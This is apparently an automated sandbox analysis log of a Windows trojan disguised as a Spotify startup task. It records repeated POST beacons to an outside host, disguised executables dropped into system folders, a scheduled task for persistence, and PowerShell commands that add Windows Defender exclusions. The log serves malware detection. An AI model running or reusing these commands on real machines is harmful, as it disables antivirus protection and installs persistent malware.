                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: fsin.top
                          Source: unknownHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: powershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000343D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\GameBarPresenceWriter\4821a341fd9e2fJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\IdentityCRL\production\4821a341fd9e2fJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMPJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9B8993A00_2_00007FFD9B8993A0
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9B890D780_2_00007FFD9B890D78
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9BC6E9B10_2_00007FFD9BC6E9B1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9BC6010F0_2_00007FFD9BC6010F
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9BC6C72B0_2_00007FFD9BC6C72B
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B890D7851_2_00007FFD9B890D78
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8C0BC551_2_00007FFD9B8C0BC5
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8A17AB51_2_00007FFD9B8A17AB
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8C0BC552_2_00007FFD9B8C0BC5
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B890D7852_2_00007FFD9B890D78
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8A17AB52_2_00007FFD9B8A17AB
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8C0BC553_2_00007FFD9B8C0BC5
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8A17AB53_2_00007FFD9B8A17AB
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B890D7853_2_00007FFD9B890D78
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 54_2_00007FFD9B8B0D7854_2_00007FFD9B8B0D78
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 54_2_00007FFD9B8B93A054_2_00007FFD9B8B93A0
                          Source: C:\Recovery\dllhost.exeCode function: 55_2_00007FFD9B8A93A055_2_00007FFD9B8A93A0
                          Source: C:\Recovery\dllhost.exeCode function: 55_2_00007FFD9B8A0D7855_2_00007FFD9B8A0D78
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CcvWVetw.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                          Source: UuIspZT5b6.exe, 00000000.00000000.1741745678.0000000000E6E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002B.00000002.2301144306.0000000002674000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002B.00000002.2301144306.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002B.00000002.2301144306.00000000026EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002C.00000002.2403448476.00000000034A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002C.00000002.2403448476.00000000034F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002C.00000002.2403448476.00000000034B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 0000002C.00000002.2403448476.000000000356C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 00000036.00000002.2403371263.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 00000036.00000002.2403371263.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exe, 00000036.00000002.2403371263.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
                          Source: UuIspZT5b6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: UuIspZT5b6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Idle.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: dllhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.csCryptographic APIs: 'CreateDecryptor'
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.csCryptographic APIs: 'CreateDecryptor'
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.csCryptographic APIs: 'CreateDecryptor'
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@48/64@1/1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\pfMyjKNB.logJump to behavior
                          Source: C:\Recovery\dllhost.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
                          Source: C:\Recovery\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-q0BH4m8spIw1QL7jvdW6
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\AppData\Local\Temp\j2ckjc1rJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
                          Source: UuIspZT5b6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: UuIspZT5b6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: UuIspZT5b6.exeReversingLabs: Detection: 68%
                          Source: UuIspZT5b6.exeVirustotal: Detection: 54%
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile read: C:\Users\user\Desktop\UuIspZT5b6.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\UuIspZT5b6.exe "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"
                          Source: unknownProcess created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                          Source: unknownProcess created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: unknownProcess created: C:\Users\user\Desktop\UuIspZT5b6.exe C:\Users\user\Desktop\UuIspZT5b6.exe
                          Source: unknownProcess created: C:\Users\user\Desktop\UuIspZT5b6.exe C:\Users\user\Desktop\UuIspZT5b6.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: unknownProcess created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          Source: unknownProcess created: C:\Users\user\Desktop\UuIspZT5b6.exe "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          Source: unknownProcess created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /fJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
